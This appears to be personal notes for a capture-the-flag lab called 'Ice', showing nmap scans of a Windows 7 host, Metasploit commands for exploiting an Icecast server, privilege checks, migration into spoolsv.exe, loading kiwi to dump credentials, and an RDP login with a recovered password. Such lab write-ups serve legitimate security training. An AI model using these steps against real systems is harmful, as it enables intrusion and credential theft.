Ice


Active reconnaissance

Enum ports and services

General scan to all ports

sudo nmap 10.10.211.3 -p- --open -min-rate 5000 -sS -vvv -n -Pn

Focused scan

sudo nmap 10.10.211.3 -p 135,139,445,3389,5357 -sCV
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open  tcpwrapped
5357/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
sudo nmap 10.10.211.3 -p 8000 -sCV
8000/tcp open  http    Icecast streaming media server
|_http-title: Site doesn't have a title (text/html).

Vuln analysis

Port 5357

|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Port 139

netbios-ssn Microsoft Windows netbios-ssn

Host script results:
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Dark-PC
|   NetBIOS computer name: DARK-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-08-24T18:50:30-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled but not required
|_clock-skew: mean: 1h40m00s, deviation: 2h53m13s, median: 0s
|_nbstat: NetBIOS name: DARK-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:c4:e0:41:87:43 (unknown)
| smb2-time:
|   date: 2024-08-24T23:50:30
|_  start_date: 2024-08-24T23:33:50

Port 445

Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2:1:0:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2024-08-24T23:50:58
|_  start_date: 2024-08-24T23:33:50
|_nbstat: NetBIOS name: DARK-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:c4:e0:41:87:43 (unknown)
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Dark-PC
|   NetBIOS computer name: DARK-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-08-24T18:50:58-05:00
|_clock-skew: mean: 1h40m00s, deviation: 2h53m13s, median: 0s

Port 8000

PORT     STATE SERVICE VERSION
8000/tcp open  http    Icecast streaming media server
|_http-title: Site doesn't have a title (text/html).

Pasted image 20240824193822.png|500


Exploitation

Icecast

Set the victim IP

setg RHOSTS 10.10.x.x

Set the local IP (from tun0 if you a re using VPN)

setg LHOST 10.2.x.x

Privilege Escalation

Now we have a shell

getuid

Pasted image 20240824220248.png|300

Gets information about the remote system, such as OS

sysinfo

Pasted image 20240824220618.png|500

run post/multi/recon/local_exploit_suggester

Pasted image 20240824221707.png|500

Check the number session
Pasted image 20240824231014.png|500
Set session number 1

set SESSION 1
setg Lhost 10.10.x.x

Exec run

getprivs

Pasted image 20240824232307.png|200

Looting

ps

Pasted image 20240825101506.png

Migrate

migrate -N spoolsv.exe

Pasted image 20240825103500.png|300

load kiwi
help

Pasted image 20240825105633.png|300

Pasted image 20240825110114.png

Post-Exploitation

help

Pasted image 20240825124215.png|500

Pasted image 20240825124627.png|500

Pasted image 20240825124742.png

Pasted image 20240825125050.png|300

To connect remotely

rdesktop 10.10.106.178 -u Dark -p 'Password01!'